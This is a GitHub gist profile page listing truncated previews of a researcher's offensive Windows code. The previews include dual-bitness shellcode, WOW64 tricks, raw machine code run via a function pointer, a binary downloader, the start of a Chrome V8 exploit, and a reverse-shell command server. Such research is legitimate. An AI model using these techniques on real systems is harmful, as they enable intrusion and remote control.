Skip to content

Instantly share code, notes, and snippets.

View aaaddress1's full-sized avatar
🤗
buy me a beer plz 🍺

Sheng-Hao Ma aaaddress1

🤗
buy me a beer plz 🍺
1.3k followers · 35 following
View GitHub Profile
@aaaddress1
aaaddress1 / x96_shellcode.py
Created May 19, 2021 05:45
Python Script to Generate x96 Windows Shellcode
# x96_shellcode.py
# ref: gist.github.com/aaaddress1/3c0ae754f8a40024881343a085954049
# by aaaddress1@chroot.org
'''
entry:
call $+5
mov ax, cs
sub ax, 23h
je retTo32b
nop
@aaaddress1
aaaddress1 / x96shell_msgbox.asm
Created May 7, 2021 07:31
x96 Windows Shellcode: one payload able to used in both 32-bit & 64-bit
; x96 shellcode (x32+x64) by aaaddress1@chroot.org
; yasm -f bin -o x96shell_msgbox x96shell_msgbox.asm
section .text
bits 32
_main:
call entry
entry:
mov ax, cs
sub ax, 0x23
jz retTo32b
@aaaddress1
aaaddress1 / wow64Mem_Forensics.cpp
Last active May 3, 2024 22:12
get 64 bit windows API address in pure 32 bit mode
// get 64 bit Windows API in pure 32 bit mode!
// it's necessary to disable all the compiler optimization if you're using MSVC.
// more detail check out ReWolf's amazing trick: blog.rewolf.pl/blog/?p=102
// by aaaddress1@chroot.org
#include <iostream>
#include <stdio.h>
#include <windows.h>
// ref: raw.githubusercontent.com/rwfpl/rewolf-wow64ext/master/src/wow64ext.h
#include "wow64ext.h"
@aaaddress1
aaaddress1 / wow64_read64Env.cpp
Created April 20, 2021 10:37
fetch current EXE path from 64 bit PEB->Ldr (In 32 bit mode)
// fetch current EXE path from 64 bit PEB->Ldr (In 32 bit mode)
// by aaaddress1@chroot.org
#include <stdint.h>
#include <stdio.h>
#include <windows.h>
typedef struct _PEB_LDR_DATA64
{
ULONG Length;
BOOLEAN Initialized;
ULONG64 SsHandle;
@aaaddress1
aaaddress1 / memcpy32.cpp
Created April 20, 2021 09:48
memcpy32.cpp
// memcpy 32bit by aaaddress1@chroot.org
#include <stdint.h>
#include <stdio.h>
#include <windows.h>
int main(void) {
int dummy(0x41414242);
char buf[8] = {0};
((void(cdecl *)(DWORD, DWORD, DWORD))"\x8B\x7C\x24\x04\x8B\x74\x24\x08\x8B\x4C\x24\x0C\xF3\xA4\xC3")((size_t)buf, (size_t)&dummy, sizeof(dummy));
puts(buf);
@aaaddress1
aaaddress1 / http_download.h
Last active May 3, 2024 22:13
using WinHTTP to obtain binary data (MSVC)
// using WinHTTP to obtain binary data (MSVC)
// by aaaddress1@chroot.org
#include <vector>
#include <stdio.h>
#include <windows.h>
#include <Winhttp.h>
#pragma comment(lib, "winhttp")
using namespace std;
vector<char>* httpRecv(const wchar_t url[]) {
@aaaddress1
aaaddress1 / chrome-v8-issue-1126249.js
Created March 22, 2021 03:38 — forked from hkraw/chrome-v8-issue-1126249.js
class Helpers {
constructor() {
this.cvt_buf = new ArrayBuffer(8);
this.cvt_f64a = new Float64Array(this.cvt_buf);
this.cvt_u64a = new BigUint64Array(this.cvt_buf);
this.cvt_u32a = new Uint32Array(this.cvt_buf);
}
ftoi(f) {
@aaaddress1
aaaddress1 / cmdSrv.py
Created March 4, 2021 15:47
cmdSrv.py
'''
Cmd Multiple RevShell Server by aaaddress1@chroot.org
[test] $ ncat localhost 54321 | cmd
'''
import time, socket
def handleClient(connection):
try:
time.sleep(1)
connection.send(b'whoami && echo 123 > ggdada.txt && exit\n')
except Exception as e:
@aaaddress1
aaaddress1 / dynPatchSelf.cc
Last active February 26, 2021 08:05
dynPatchSelf.cc
// dynamic patch self function by aaaddress1@chroot.org
#include <windows.h>
#include <algorithm>
#include <iterator>
using namespace std;
void hello()
{
puts("Are You Helloing?");
}
int main(void)
@aaaddress1
aaaddress1 / vehMon.cpp
Last active May 3, 2024 22:14
VEH Monitor
// VEH Montior by aaaddress1@chroot.org
#include <stdio.h>
#include <windows.h>
#pragma warning( disable : 4996 )
LONG __stdcall TrapFilter(PEXCEPTION_POINTERS pexinf) {
if (pexinf->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION && ((DWORD)pexinf->ExceptionRecord->ExceptionAddress & 0x80000000))
pexinf->ContextRecord->Eip = pexinf->ContextRecord->Eip ^ 0x80000000;
else if (pexinf->ExceptionRecord->ExceptionCode != EXCEPTION_SINGLE_STEP)
return EXCEPTION_CONTINUE_SEARCH;